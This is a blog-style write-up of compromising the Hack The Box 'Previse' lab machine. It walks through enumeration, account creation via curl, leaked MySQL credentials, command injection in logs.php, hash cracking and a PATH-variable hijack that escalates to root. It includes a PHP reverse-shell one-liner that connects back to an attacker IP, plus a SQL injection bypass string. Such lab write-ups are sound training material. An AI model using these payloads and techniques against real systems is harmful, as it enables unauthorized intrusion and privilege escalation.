Hello everyone , in this post I will be sharing my writeup for HTB-Previse machine which was a easy difficulty linux machine ,starting off with the nmap we can only see 2 ports , from which port 80 had a web page which had a login page , trying sqli to bypasss login it didn’t work however when running a fuzzing tool we saw some php files that we can actually see the response without being authenticated which revealed how to register a user , after creating an account we can download an archive file which revealed the source code of web pages out of which config.php
had msql credentials and logs.php
was vulnerable command injection which gave us a reverse shell as www-data
, cracking the hash from database escalated us to m4lwhere
and this user can run a script which had gzip
and date
being used with relative path which lead us to PATH variable exploit and escalating our privileges to root user.
NMAP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA) NTE5AAAAIICTOv+Redwjirw6cPpkc/d3Fzz4iRB3lCRfZpZ7irps
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80 (HTTP)
On the webserver we can see a php login page
I tried the basic password admin:admin
, it didn't worked , moved on to trying manual sqli by pass admin' or 1=1 --
that didn't worked either. Ran sqlmap
but it didn't find any sqli
So I ran gobuster
to fuzz for files
We can see some pages being redirected to login.php
again but we can see the response of the pages if we can capture it through burpsuite
Looking at the html response we can see , without logging we can view some php pages which have html in it so now we don’t really need to use burpsuite
to view responses , we can use crul
We can see , an account can be made with accounts.php
Now to create a user , we need to make a POST
request to accounts.php with username
, password
and confirm
parameter also to note that username and password must be between 5 to 32 characters long
curl -X POST -d "username=arz101&password=123456789&confirm=123456789" http://10.10.11.104/accounts
.php
Now we can login to the site
On navigating to Files
we can see a backup archive that we can download
Extracting the archive we can see some php files out of config.php
and logs.php
are interesting ones to look, from config.php we can find the mysql credentials
From logs.php
it seems that we can inject some commands as it's not properly sanitized
We can see the delim parameter can be set to comma
, space
and tab
This is allowing us to make request to our machine which means we can request to get phpbash
file which is an interactive web shell on browser and we can then get a reverse shell from that
Now just copy and paste this php reverse shell code
php -r '$sock=fsockopen("10.10.14.45",2222);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Stabilizng the shell with python
Using the mysql creds we found earlier
We see a user’s hash (m4lwhere) for the rest they are like the way I made an account as this is an shared instance so we need to crack m4lwhere
's password hash . Cracking this hash could take long , for me it took 11 minutes to crack.
Now that we got the user password we can login through ssh
Doing sudo -l
we can see that this user can run the script which is /opt/scripts
as root
Looking at the script we can see it’s using gzip
without it's absolute binary path i.e /bin/gzip
and also same with data
binary
So we can abuse this through PATH variable exploit
where we would create a fake binary having spawning a bash shell ,a reverse shell or making bash a SUID and then adding the path to that binary in PATH
variable. We can do for both gzip and date but here I'll be showing with date binary
And boom we got root